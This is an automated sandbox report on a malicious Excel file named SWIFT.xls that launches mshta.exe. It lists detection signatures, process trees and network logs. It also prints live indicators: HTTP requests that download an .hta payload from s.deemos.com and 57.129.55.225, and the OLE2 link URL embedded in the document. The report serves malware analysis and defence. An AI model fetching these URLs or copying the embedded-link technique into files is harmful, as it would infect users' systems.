Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT.xls

Overview

General Information

Sample name:SWIFT.xls
Analysis ID:1578835
MD5:ed7928a72e06e8122d90ae9eb43736d6
SHA1:784a817af018202ee02bad8760c85b996942a38b
SHA256:e5d3f77e814bb0dfe7773205bf105a2b9d08f6f0245b7c1808e1c72748e180e9
Tags:exploitxlsuser-nfsec_pl
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w11x64_office
  • EXCEL.EXE (PID: 3488 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 6916 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 2276 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • Acrobat.exe (PID: 5272 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding MD5: 4354BCD7483AABB81809350484FFD58F)
    • AcroCEF.exe (PID: 4620 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: B104218348848F1F113AF11C0982931A)
      • AcroCEF.exe (PID: 8244 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1656,i,13889243780433033577,2117766799754663764,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: B104218348848F1F113AF11C0982931A)
  • EXCEL.EXE (PID: 8936 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: File With Uncommon Extension Created By An Office Application
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KA259YPD\mniscreenthinkinggoodforentiretimegoodfotbusubessthings[1].hta
Sigma detected: Suspicious Microsoft Office Child Process
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 3488, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 6916, ProcessName: mshta.exe
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3488, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 49808
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 49808, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3488, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SWIFT.xlsVirustotal: Detection: 22%Perma Link
Source: SWIFT.xlsReversingLabs: Detection: 26%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: cxcs.microsoft.net
Source: global trafficDNS query: name: tse1.mm.bing.net
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficDNS query: name: chrome.cloudflare-dns.com
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49766
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49765
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49766
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49765
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49765
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49766
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49765
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49808 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49808
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.24:49809
Source: global trafficTCP traffic: 192.168.2.24:49809 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49766
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49765
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49766
Source: global trafficTCP traffic: 192.168.2.24:49766 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49765
Source: global trafficTCP traffic: 192.168.2.24:49765 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49825
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49825
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49826
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49826
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49824 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49824
Source: global trafficTCP traffic: 192.168.2.24:49823 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49823
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49825
Source: global trafficTCP traffic: 192.168.2.24:49825 -> 162.159.61.3:443
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49826
Source: global trafficTCP traffic: 162.159.61.3:443 -> 192.168.2.24:49826
Source: global trafficTCP traffic: 192.168.2.24:49826 -> 162.159.61.3:443
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: global trafficHTTP traffic detected: GET /lqSa1Aoh?&linen=frightened&trumpet HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /lqSa1Aoh?&linen=frightened&trumpet HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 57.129.55.225
Source: global trafficDNS traffic detected: DNS query: cxcs.microsoft.net
Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: SWIFT.xls, F57DEEF0.emf.0.dr, 06331000.0.dr, 269A627E.emf.0.dr, DD5D6A9F.emf.0.dr, 8C207648.emf.0.dr, 9527D3D2.emf.32.dr, 794F9615.emf.0.dr, FA08C231.emf.0.dr, EE7A48AA.emf.0.drString found in binary or memory: http://www.wowform.com
Source: NGLClient_AcrobatReader124.4.20272.6.log.25.drString found in binary or memory: https://cc-api-data.adobe.io/ingest
Source: Primary1734704851380286400_333D789C-712C-4FA7-9D95-BDF17FB34A92.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: Primary1734704851380286400_333D789C-712C-4FA7-9D95-BDF17FB34A92.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/rawguids/37327920121
Source: Primary1734704851380286400_333D789C-712C-4FA7-9D95-BDF17FB34A92.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/rawguids/39569681348
Source: Primary1734704851380286400_333D789C-712C-4FA7-9D95-BDF17FB34A92.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/rawguids/39927523556
Source: Primary1734704851380286400_333D789C-712C-4FA7-9D95-BDF17FB34A92.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/rawguids/40398340271
Source: SWIFT.xls, 06331000.0.drString found in binary or memory: https://s.deemos.com/lqSa1Aoh?&linen=fri
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823

System Summary

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: screenshotOCR: document is protected 3 p dick Or&r C 1000256 1000258 Desch ption Of Product 1 Desch ption Of Prcoct
Source: screenshotOCR: document is protected 3 p dick Or&r C 1000256 1000258 Desch ption Of Product 1 Desch ption Of Prcoct
Source: screenshotOCR: document is protected 3 p dick Or&r C 1000256 1000258 Desch ption Of Product 1 Desch ption Of Prcoct
Source: screenshotOCR: document is protected 3 p dick Or&r C 1000256 1000258 Desch ption Of Product 1 Desch ption Of Prcoct
Source: screenshotOCR: document is protected 3 p dick 1000256 1000258 Desch ption Of Product 1 Desch ption Of Prcoct 2 2 3
Source: screenshotOCR: document is protected Descri 12 Descri Ready Qty Ifrits sets Lkit 42450 23.22600 Rice 30'000.oo 3'00
Source: screenshotOCR: document is protected (i) $2 CD Qty 2 3 Conditional Formatting v $22849_m SN677_m sets pcs Search S2
Source: screenshotOCR: document is protected (i) $2 CD Qty 2 3 Conditional Formatting v $22849_m SN677_m sets pcs Search S2
Source: screenshotOCR: document is protected (i) $2 CD Qty 2 3 Conditional Formatting v $22849_m SN677_m 1000256 Descriptiu
Excel sheet contains many unusual embedded objects
Source: SWIFT.xlsOLE: Microsoft Excel 2007+
Source: 06331000.0.drOLE: Microsoft Excel 2007+
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KA259YPD\mniscreenthinkinggoodforentiretimegoodfotbusubessthings[1].htaJump to behavior
Source: SWIFT.xlsStream path 'MBd006D439F/\x1Ole' : https://s.deemos.com/lqSa1Aoh?&linen=frightened&trumpetw1h_xA=cAqHv.uzUqGJGExMrwr0C189bJ8UxUrTSRsvVXoyB6u2P8khUsj3kZjszVQATKdfwBGnCZ97z8Zc264Ud6YN6Z0LbeNJy3iAuOTvym2XXgObYQbDZLezhLoVDJCW9M6N4jk6UdrSdj9DqFB6c3dVBMuggpH8HEZBLT8mGhsKLsKAn8obIIdPxMDiR6wZalIppgtRVhZB6QmMwlTiU2M595Vlpnbd3_\oV8'GV5
